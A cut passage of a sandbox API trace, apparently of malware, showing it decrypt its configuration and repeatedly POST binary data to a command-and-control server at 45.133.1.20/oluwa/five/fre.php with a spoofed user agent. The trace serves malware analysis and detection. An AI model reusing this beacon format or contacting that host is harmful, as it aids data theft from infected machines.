dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6da320, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1924) returned 0xbe4 [0312.205] Sleep (dwMilliseconds=0xea60) [0312.207] GetProcessHeap () returned 0x6a0000 [0312.207] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0312.208] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0312.209] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0312.221] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0312.234] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0312.241] GetProcessHeap () returned 0x6a0000 [0312.241] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0312.242] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0312.242] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0312.243] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0312.243] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0312.244] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0312.292] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0312.292] GetProcessHeap () returned 0x6a0000 [0312.293] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0312.293] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0312.294] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0312.295] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0312.295] CryptDestroyKey (hKey=0x6ad020) returned 1 [0312.295] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0312.296] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0312.296] GetProcessHeap () returned 0x6a0000 [0312.296] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0312.297] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.297] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0312.298] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.298] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0312.299] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.299] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0312.302] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.303] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0312.303] GetProcessHeap () returned 0x6a0000 [0312.303] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0312.303] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0312.303] GetProcessHeap () returned 0x6a0000 [0312.304] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0312.304] GetProcessHeap () returned 0x6a0000 [0312.304] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0312.304] GetProcessHeap () returned 0x6a0000 [0312.304] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0312.304] GetProcessHeap () returned 0x6a0000 [0312.304] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0312.305] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0312.305] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0312.311] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0312.311] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bed28) returned 1 [0312.320] GetProcessHeap () returned 0x6a0000 [0312.320] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0312.321] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0312.324] CryptImportKey (in: hProv=0x6bed28, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0312.325] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0312.325] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0312.326] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0312.327] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0312.327] GetProcessHeap () returned 0x6a0000 [0312.327] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0312.330] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0312.336] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0312.337] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0312.337] CryptDestroyKey (hKey=0x6ad020) returned 1 [0312.338] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0312.339] CryptReleaseContext (hProv=0x6bed28, dwFlags=0x0) returned 1 [0312.339] GetProcessHeap () returned 0x6a0000 [0312.339] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0312.340] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.340] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0312.341] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.342] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0312.343] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.343] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0312.346] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.347] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0312.347] GetProcessHeap () returned 0x6a0000 [0312.347] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0312.347] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0312.347] GetProcessHeap () returned 0x6a0000 [0312.347] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa20 [0312.347] socket (af=2, type=1, protocol=6) returned 0xbe8 [0312.347] connect (s=0xbe8, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0312.371] FreeAddrInfoW (pAddrInfo=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0312.371] GetProcessHeap () returned 0x6a0000 [0312.371] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf058 [0312.371] GetProcessHeap () returned 0x6a0000 [0312.371] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dff48 [0312.372] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0312.373] wvsprintfA (in: param_1=0x6dff48, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0312.373] GetProcessHeap () returned 0x6a0000 [0312.373] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6df568 [0312.373] GetProcessHeap () returned 0x6a0000 [0312.374] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dff48 | out: hHeap=0x6a0000) returned 1 [0312.374] GetProcessHeap () returned 0x6a0000 [0312.374] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4be0 [0312.374] GetProcessHeap () returned 0x6a0000 [0312.374] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dff48 [0312.375] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0312.376] wvsprintfA (in: param_1=0x6dff48, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0312.376] GetProcessHeap () returned 0x6a0000 [0312.376] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0312.376] GetProcessHeap () returned 0x6a0000 [0312.376] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dff48 | out: hHeap=0x6a0000) returned 1 [0312.378] send (s=0xbe8, buf=0x6bd460*, len=242, flags=0) returned 242 [0312.379] send (s=0xbe8, buf=0x6bb998*, len=159, flags=0) returned 159 [0312.379] GetProcessHeap () returned 0x6a0000 [0312.379] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6da320 [0312.379] recv (in: s=0xbe8, buf=0x6da320, len=4048, flags=0 | out: buf=0x6da320*) returned 204 [0312.445] GetProcessHeap () returned 0x6a0000 [0312.447] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0312.448] GetProcessHeap () returned 0x6a0000 [0312.448] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0312.448] GetProcessHeap () returned 0x6a0000 [0312.449] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6df568 | out: hHeap=0x6a0000) returned 1 [0312.449] GetProcessHeap () returned 0x6a0000 [0312.449] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf058 | out: hHeap=0x6a0000) returned 1 [0312.449] closesocket (s=0xbe8) returned 0 [0312.450] GetProcessHeap () returned 0x6a0000 [0312.450] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa20 | out: hHeap=0x6a0000) returned 1 [0312.450] GetProcessHeap () returned 0x6a0000 [0312.450] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0312.451] GetProcessHeap () returned 0x6a0000 [0312.451] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0312.451] GetProcessHeap () returned 0x6a0000 [0312.452] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0312.452] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6da320, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1928) returned 0xbe8 [0312.456] Sleep (dwMilliseconds=0xea60) [0312.457] GetProcessHeap () returned 0x6a0000 [0312.457] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0312.458] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0312.459] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0312.467] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0312.468] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0312.480] GetProcessHeap () returned 0x6a0000 [0312.492] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0312.493] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0312.493] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0312.494] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0312.495] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0312.495] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0312.496] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0312.496] GetProcessHeap () returned 0x6a0000 [0312.496] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0312.501] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0312.501] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0312.502] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0312.502] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0312.503] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0312.503] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0312.503] GetProcessHeap () returned 0x6a0000 [0312.503] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0312.504] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.505] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0312.505] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.506] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0312.506] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.507] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0312.507] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.520] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0312.520] GetProcessHeap () returned 0x6a0000 [0312.520] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0312.521] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0312.521] GetProcessHeap () returned 0x6a0000 [0312.522] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0312.522] GetProcessHeap () returned 0x6a0000 [0312.524] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0312.524] GetProcessHeap () returned 0x6a0000 [0312.525] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0312.526] GetProcessHeap () returned 0x6a0000 [0312.526] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0312.526] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0312.527] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0312.535] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0312.536] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bed28) returned 1 [0312.545] GetProcessHeap () returned 0x6a0000 [0312.545] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0312.546] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0312.546] CryptImportKey (in: hProv=0x6bed28, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0312.547] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0312.547] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0312.548] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0312.548] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0312.548] GetProcessHeap () returned 0x6a0000 [0312.549] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0312.551] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0312.554] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0312.554] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0312.555] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0312.555] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0312.556] CryptReleaseContext (hProv=0x6bed28, dwFlags=0x0) returned 1 [0312.556] GetProcessHeap () returned 0x6a0000 [0312.556] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0312.556] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.557] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0312.558] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.558] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0312.559] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.559] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0312.560] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.560] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0312.560] GetProcessHeap () returned 0x6a0000 [0312.560] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0312.560] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0312.561] GetProcessHeap () returned 0x6a0000 [0312.561] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baaf0 [0312.561] socket (af=2, type=1, protocol=6) returned 0xbec [0312.562] connect (s=0xbec, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0312.586] FreeAddrInfoW (pAddrInfo=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0312.586] GetProcessHeap () returned 0x6a0000 [0312.586] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6befd0 [0312.586] GetProcessHeap () returned 0x6a0000 [0312.586] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dff48 [0312.587] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0312.588] wvsprintfA (in: param_1=0x6dff48, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0312.588] GetProcessHeap () returned 0x6a0000 [0312.588] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6df1a8 [0312.588] GetProcessHeap () returned 0x6a0000 [0312.588] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dff48 | out: hHeap=0x6a0000) returned 1 [0312.589] GetProcessHeap () returned 0x6a0000 [0312.589] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4910 [0312.589] GetProcessHeap () returned 0x6a0000 [0312.589] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dff48 [0312.590] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0312.593] wvsprintfA (in: param_1=0x6dff48, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0312.593] GetProcessHeap () returned 0x6a0000 [0312.593] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0312.593] GetProcessHeap () returned 0x6a0000 [0312.594] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dff48 | out: hHeap=0x6a0000) returned 1 [0312.594] send (s=0xbec, buf=0x6bd460*, len=242, flags=0) returned 242 [0312.595] send (s=0xbec, buf=0x6bb998*, len=159, flags=0) returned 159 [0312.595] GetProcessHeap () returned 0x6a0000 [0312.596] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6da320 [0312.597] recv (in: s=0xbec, buf=0x6da320, len=4048, flags=0 | out: buf=0x6da320*) returned 204 [0312.688] GetProcessHeap () returned 0x6a0000 [0312.691] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0312.691] GetProcessHeap () returned 0x6a0000 [0312.692] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0312.692] GetProcessHeap () returned 0x6a0000 [0312.692] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6df1a8 | out: hHeap=0x6a0000) returned 1 [0312.693] GetProcessHeap () returned 0x6a0000 [0312.693] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6befd0 | out: hHeap=0x6a0000) returned 1 [0312.693] closesocket (s=0xbec) returned 0 [0312.694] GetProcessHeap () returned 0x6a0000 [0312.694] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baaf0 | out: hHeap=0x6a0000) returned 1 [0312.694] GetProcessHeap () returned 0x6a0000 [0312.694] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0312.695] GetProcessHeap () returned 0x6a0000 [0312.695] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0312.695] GetProcessHeap () returned 0x6a0000 [0312.695] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0312.695] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6da320, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x192c) returned 0xbec [0312.697] Sleep (dwMilliseconds=0xea60) [0312.701] GetProcessHeap () returned 0x6a0000 [0312.701] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0312.702] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0312.703] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0312.709] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0312.710] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0312.721] GetProcessHeap () returned 0x6a0000 [0312.721] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 